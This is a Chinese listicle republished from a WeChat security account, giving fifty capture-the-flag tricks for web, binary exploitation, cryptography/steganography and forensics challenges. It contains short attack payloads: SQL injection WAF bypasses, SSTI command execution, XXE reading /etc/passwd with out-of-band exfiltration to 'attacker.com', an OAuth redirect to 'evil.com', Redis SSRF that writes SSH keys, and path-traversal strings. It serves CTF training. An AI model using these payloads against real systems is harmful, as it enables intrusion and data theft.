专注网络安全领域,包括安全岗位招聘,红蓝队建设,实战攻防,内网渗透,社工,CTF
,安全技术分享等。
CTF 竞赛的核心玩法
- 核心目标
: 以 Flag 为导向,光速拆解问题、熟练运用各种工具、培养模式化思维。 - 关键原则
: 先撒网再深挖(信息收集要全面)、分而治之(复杂任务拆开搞)。
第一弹:Web 安全(15 个骚套路)
- SQL 注入绕过 WAF
: -
用 /*!50000注释*/给 SQL 语句“化妆”(MySQL 的独家秘方)。例如,SELECT /*!50000CONCAT*/(user,password) FROM users。 CONCAT(CHAR(115),CHAR(101))
闪亮登场,替代明文字符串,让 WAF 看不清。 - SSTI 模板注入
: -
Flask/Jinja2 里, {{''.__class__.__mro__[1].__subclasses__()}}带你找到那些“危险分子”。 -
Twig 模板里, {{_self.env.registerUndefinedFilterCallback("exec")}}直接执行命令,简单粗暴。 - 文件包含漏洞,用起来!
: -
PHP 伪协议 php://input读取 POST 的原始数据,悄咪咪写入 Webshell。 -
利用 logrotate日志文件包含漏洞(比如通过/proc/self/environ泄露路径)。 - JWT 伪造攻击
: -
把 Header 里的 alg改成none(记得把签名字段删掉哦)。 -
暴力破解弱密钥, hashcat -m 16500安排上! - XXE 漏洞,榨干它的价值
: <!ENTITY xxe SYSTEM "file:///etc/passwd">
读取系统文件,就像开盲盒一样刺激。 -
外带数据(OOB)骚操作: http://attacker.com/?data=%xxe;,数据到手,快乐我有。 - CSRF 绕过同源策略
: -
精心构造一个自动提交表单的恶意页面,用 <img src="[URL]">触发请求,神不知鬼不觉。 - SSRF 内网探测
: gopher://
协议 + Redis 未授权访问 = 写入 SSH 密钥,内网畅游不是梦。 - 反序列化漏洞
: -
PHP 里, __destruct()或__wakeup()魔术方法,让反序列化变成“夺命连环call”。 -
Java Commons-Collections, InvokerTransformer帮你执行命令,威力十足。 - Cookie 伪造
: -
Flask 的 Session 签名伪造,用已知密钥生成恶意 Cookie, flask-unsign工具用起来。 - CORS 配置错误
: -
修改请求头 Origin: target.com,骗服务器返回敏感数据,这招叫做“偷梁换柱”。 - HTTP 请求走私
: Transfer-Encoding: chunked
和 Content-Length打架,轻松绕过网关,实现请求走私。- 目录穿越读取文件
: ....//
或 %2e%2e%2f,绕过路径过滤,想看啥就看啥。- Web 缓存投毒
: -
篡改 X-Forwarded-Host头,把恶意内容注入缓存页面,让别人“中毒”。 - OAuth 登录劫持
: -
伪造回调 URL 窃取授权码(比如 redirect_uri=http://evil.com),狸猫换太子。 - 浏览器特性,拿来吧你!
: <link rel="prefetch" href="secret.php">
悄悄窃取登录态,这波操作很细节。
第二弹:逆向工程与 PWN(12 个骚套路)
- 函数定位,快准狠
: -
IDA 里搜字符串 "flag"或"correct",关键逻辑就在眼前。 - 栈溢出,安排!
: -
计算偏移量, cyclic 200生成字符串,dmesg查看崩溃地址,一套带走。 - 格式化字符串漏洞
: %n
向任意地址写入数据,修改 GOT 表,实现“指哪打哪”。 - 堆利用(UAF/Double Free)
: -
释放后重用(UAF),修改虚表指针,劫持控制流,这叫“借尸还魂”。 - ROP 链构造
: ROPgadget --binary ./pwn
提取可用指令片段,拼凑 ROP 链,实现“乾坤大挪移”。 - 反调试,绕过它!
: -
修改 /proc/self/status里的TracerPid字段,骗过调试器,让它“眼瞎”。 - 动态 Hook,真香!
: LD_PRELOAD
劫持 strcmp()函数,绕过密码校验,实现“偷天换日”。- Shellcode 编写
: -
生成无空字符的 Shellcode, msfvenom -b 'x00',让 Shellcode 更“丝滑”。 - 整数溢出,利用起来
: -
触发符号错误(比如 size = -1绕过长度检查),实现“以小博大”。 - Angr 符号执行
: -
自动求解路径约束,破解 CTF 里的“迷宫”题,让 Angr 带你飞。 - Patch 二进制文件
: Binary Ninja
修改跳转条件( jz→jnz),改变程序命运。- 侧信道攻击
: -
通过时间差判断密码正确性,逐字符爆破,感受“时间的力量”。
第三弹:密码学与隐写术(13 个骚套路)
- Base 家族,一眼识破
: -
Base64(末尾 =),Base32(全是“大高个”字母),Base58(没有 0/O/I/l)。 - RSA 低指数攻击
: -
当 e=3且明文很短时,直接对密文开立方,简单粗暴拿 Flag。 - RSA 共模攻击
: -
相同明文加密后,用扩展欧几里得算法恢复明文,感受数学的魅力。 - 哈希长度扩展攻击
: -
利用 SHA1/MD5 的填充机制伪造合法签名, hash_extender工具用起来。 - 培根密码
: -
5 位二进制模式(A=AAAAA, B=AAAAB...),感受“培根”的香气。 - 词频分析
: -
英文单表替换密码,统计高频字母(E、T、A),让密码“现出原形”。 - LSB 隐写提取
: Stegsolve.jar
分析图片 RGB 的最低位,找出隐藏的秘密。 - 音频隐写
: -
Audacity 查看频谱图,寻找摩尔斯电码或二进制波形,让声音“说话”。 - ZIP 伪加密破解
: -
修改 ZIP 文件头加密标记位, zipdetails分析结构,让伪加密“破功”。 - PDF 隐写
: pdftotext
提取隐藏文本,或者检查对象流( /FlateDecode),挖掘 PDF 里的秘密。- NTFS 数据流隐藏
: dir /R
查看 ADS(Alternate Data Stream),找出那些“隐身”的文件。 - PNG 文件修复
: -
手动修复文件头( 89 50 4E 47 0D 0A 1A 0A)和 CRC 校验,让图片“复活”。 - 二维码数据提取
: zbarimg
扫描模糊或残缺二维码,让信息“重见天日”。
第四弹:MISC 与编程(10 个骚套路)
- 编码转换,自动化搞定
: -
Python 脚本批量处理 Hex/Base85/URL 编码,效率翻倍。 - 流量分析,Wireshark 出马
: -
过滤 HTTP 流: http.request.method == "POST",关键信息不放过。 - 内存取证,Volatility 显神通
: -
提取进程列表: volatility -f dump.raw pslist,让“罪犯”无处遁形。 - 社会工程学,信息收集
: -
通过 WHOIS 查询域名注册人邮箱,掌握“关键人物”信息。 - 正则表达式,暴力提取
: grep -oE 'flag{[a-zA-Z0-9_]+}'
快速匹配 Flag 格式,一抓一个准。 - 时间盲注,自动化爆破
: -
编写 Python 脚本,结合 requests与延时判断,逐字符爆破,让时间“说真话”。 - Git 泄露,利用起来
: -
访问 /.git/HEAD确认存在,git-dumper恢复源码,拿到“源代码宝藏”。 - DNS 隧道检测
: -
分析长域名请求(比如 abcd1234.evil.com携带 Base64 数据),揪出“隐秘通道”。 - Excel 宏代码提取
: -
解压 XLSM 文件,检查 vbaProject.bin中的恶意宏,让病毒“无处藏身”。 - PDF 混淆,绕过它!
: qpdf --stream-data=uncompress
解压对象流,让混淆“失效”。
黑客/
原文始发于微信公众号(龙哥网络安全):CTF 大神才知道的 50 个解题骚套路,速速收藏!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论